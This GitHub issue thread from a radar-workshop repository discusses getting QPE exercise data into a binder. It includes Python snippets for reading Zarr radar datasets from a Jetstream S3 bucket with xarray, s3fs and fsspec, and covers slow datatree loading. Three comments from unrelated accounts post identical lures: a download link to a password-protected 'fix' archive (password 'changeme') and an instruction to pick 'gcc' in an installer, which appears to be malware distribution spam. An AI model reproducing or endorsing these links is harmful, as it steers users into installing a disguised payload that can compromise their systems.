### ISSUE TITLE
Getting data in the binder 

### ISSUE THREAD

**Issue by jfigui** [openradar/erad2024#94]

**Comment by jfigui** [comment]
@openradar/erad2024-team ,

We need to download the data a-priori for the QPE exercise and we thought to do it through a script in the appendix.txt . Are you OK with that or do you have other suggestions?

We do not have a way to read data from s3 buckets directly yet in Pyrad.

**Comment by aladinor** [comment]
@mgrover1 and I have created an analysis-ready version of the dataset, which is stored in the bucket. It can be read using `xarray.open_datatree`; you don't need to download any data. Do you think it will work for you @jfigui? 

This is the code that you need to open the dataset:

```python 
from xarray.backends.api import open_datatree

URL = 'https://js2.jetstream-cloud.org:8001/'
path = f'pythia/radar/erad2024'
fs = s3fs.S3FileSystem(anon=True, client_kwargs=dict(endpoint_url=URL))
file = s3fs.S3Map(f"{path}/zarr_radar/erad_2024.zarr", s3=fs)
dt = open_datatree(file, engine='zarr', consolidated=True)
```
Then it will load a `datatree` (dt) with the c-band and x-band nodes, and each node contains all sweeps and all files concatenated along the `volume_time` dimension. We must have the `xarray` version `v2014.07.01` to open this dataset. Please let me know if this works for you.

**Comment by jfigui** [comment]
I don't think it works for us. We need access to the original files and we thought it would be good to have them available in advance so that we do not need to download lots of data on the fly.

The QPE exercise needs more data that more demonstrations

**Comment by mgrover1** [comment]
@jfigui - do you have a ftp server or google drive link to the data?

**Comment by jfigui** [comment]
We need to process blocks of data stored locally at the moment. Is there a way to mount a drive in the image?

**Comment by jfigui** [comment]
We can also restrict the size of our data by removing some unnecessary data. Possibly enough to put it in github

**Comment by kmuehlbauer** [comment]
@mgrover1 Please correct me if I'm wrong. The bottleneck is the image size, which we should keep as small as possible. If deployed on the pythia binder hub, there is a larger storage per instance. Please add the data to the jetstream s3 bucket, where you can fetch it into the running notebook.

I'd strongly vote against putting large data (>tens of MB) into github or docker image.

**Comment by mgrover1** [comment]
@jfigui - the bucket storing the data is located on the same network as the jupyter/binder hub, can add a bash script if that works for you that pulls from the bucket, at the top of the notebook you are using for the exercise. I can assure you the transfer speeds will be quick

This will make the course more reproducible, with an opportunity to migrate this over to a more permanent space such as the radar cookbook. Where is the data currently located? Has it been used in previous repositories?

**Comment by jfigui** [comment]
We should have all the original files we need for the exercise stored "locally" before Pyrad runs. If you think we can do that fast enough then that is fine.

**Comment by jfigui** [comment]
we do not use xradar yet in Pyrad

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jfigui** [comment]
OK, If it is on the order of 1 minute or so I think we can deal with it :)

**Comment by ghiggi** [comment]
I quickly looked back into my snippets and found out that past solutions I was using to read Zarr Store on cloud buckets does not work well with recent Zarr versions. 

I found a new solution to open the Zarr store directly using `fsspec` and the `get_mapper` method, but the old `fs.open` approach (with all simple/block cache variants) does not work anymore. I get the error: `Starting with Zarr 2.11.0, stores must be subclasses of BaseStore, if your store exposes the MutableMapping interface wrap it in Zarr.storage.KVStore`. 

Furthermore, opening the datatree is extremely slow (often hangs when I tried). Maybe @aladinor has something to add on this topic. 

Here below I provide the code to reproduce the solutions and problems. 
 
```
import s3fs 
import zarr
import fsspec
import xarray as xr
from xarray.backends.api import open_datatree

URL =  "https://js2.jetstream-cloud.org:8001"
path = f"pythia/radar/erad2024"

#---------------------------------------------------------.
#### List bucket files 
fs = fsspec.filesystem("s3", anon=True, client_kwargs=dict(endpoint_url=URL))
fs.glob(f"pythia/*")
fs.glob(f"{path}/*")
fs.glob(f"{path}/gpm_api/*")
fs.glob(f"{path}/gpm_api/2A.GPM.DPR.V9-20211125.20230820-S213941-E231213.053847.V07B.zarr/*")
fs.glob(f"{path}/gpm_api/KNKX20230820_221341_V06.zarr/*")

#---------------------------------------------------------.
#### Open with s3fs.S3FileSystem
fs = s3fs.S3FileSystem(anon=True, client_kwargs=dict(endpoint_url=URL))

# Dataset
file = s3fs.S3Map(f"{path}/gpm_api/2A.GPM.DPR.V9-20211125.20230820-S213941-E231213.053847.V07B.zarr", s3=fs)
ds = xr.open_zarr(file, consolidated=True)

# Datatree
file = s3fs.S3Map(f"{path}/gpm_api/KNKX20230820_221341_V06.zarr", s3=fs)
dt = open_datatree(file, engine='zarr', consolidated=True)

#-------------------------------------------------------------------------------------
#### Open with fsspec directly  
fs = fsspec.filesystem("s3", anon=True, client_kwargs=dict(endpoint_url=URL))

# Dataset
file = fs.get_mapper(f"{path}/gpm_api/2A.GPM.DPR.V9-20211125.20230820-S213941-E231213.053847.V07B.zarr")
ds = xr.open_zarr(file, consolidated=True, chunks={}) 
ds["zFactorFinalNearSurface"] = ds["zFactorFinalNearSurface"].compute()

# Datatree [SUPERSLOW ... NEVER ENDING ...]
file = fs.get_mapper(f"{path}/gpm_api/KNKX20230820_221341_V06.zarr")
dt = open_datatree(file, engine="zarr", consolidated=True, chunks={}) 

 
#-------------------------------------------------------------------------------------
#### fs.open() does not work anymore !  
# Error:
# Starting with Zarr 2.11.0, stores must be subclasses of BaseStore, 
# if your store exposes the MutableMapping interface wrap it in Zarr.storage.KVStore

fs = fsspec.filesystem("s3", anon=True, client_kwargs=dict(endpoint_url=URL))


file = fs.open(f"{path}/gpm_api/2A.GPM.DPR.V9-20211125.20230820-S213941-E231213.053847.V07B.zarr")
ds = xr.open_zarr(file, consolidated=True, chunks={}) 

# Context manager
with fs.open(f"{path}/gpm_api/2A.GPM.DPR.V9-20211125.20230820-S213941-E231213.053847.V07B.zarr") as file:
    ds = xr.open_zarr(file, consolidated=True, chunks={}) 

with fs.open(f"{path}/gpm_api/KNKX20230820_221341_V06.zarr") as file:
    dt = open_datatree(file, engine="zarr", chunks={}) 

#------------------------------------------------------------------------------------- 
#### Caching Blocks of Data (for re-access) (instead of full file download with simplecache)
import appdirs
from fsspec.implementations.cached import CachingFileSystem, SimpleCacheFileSystem
fs = fsspec.filesystem("s3", anon=True, client_kwargs=dict(endpoint_url=URL))
cache_expiry_times = 60*5 
block_size = 2**20
cachedir = appdirs.user_cache_dir("ABI-simple-cache-numpy")
fs_block = CachingFileSystem(
    fs=fs,
    cache_storage=cachedir,
    expiry_time=cache_expiry_times,  # seconds 
)

file = fs_block.open(f"{path}/gpm_api/2A.GPM.DPR.V9-20211125.20230820-S213941-E231213.053847.V07B.zarr", block_size=block_size)
ds = xr.open_zarr(file, consolidated=True, chunks={}) 
ds["zFactorFinalNearSurface"] = ds["zFactorFinalNearSurface"].compute()

#------------------------------------------------------------------------------------- 
 
``

**Comment by aladinor** [comment]
I have been working on `xarray.datatree` because I found out that it takes too long as [here](https://github.com/pydata/xarray/issues/9376). I recently added a new PR to solve that issue [here](https://github.com/pydata/xarray/pull/9377). @ghiggi what `xarray` version are you working with?

**Comment by ghiggi** [comment]
I recall to have seen such PR so I updated to xarray 2024.7.0. But now that I checks looks so strange: conda list say is 2024.7.0 ... `import xarray as xr; xr.__version__` says is 2024.2.0.  Really strange. Time for a fresh environment :smile: ..

**Comment by kmuehlbauer** [comment]
I'd suggest to fire up a binder instance and debug directly there.

**Comment by ghiggi** [comment]
Ah but your PR is not included in xarray `2024.7.0`. We need to wait to get the new xarray release (one of the next days?) ...

**Comment by aladinor** [comment]
I am not sure if there will be a new release soon... therefore I suggest to install it directly from the repo

**Comment by ghiggi** [comment]
Yes make sense ! I just tried out too and now it's muuuch faster opening the datatree. Good work !!!

**Comment by mgrover1** [comment]
We should add an install to that specific branch 👍
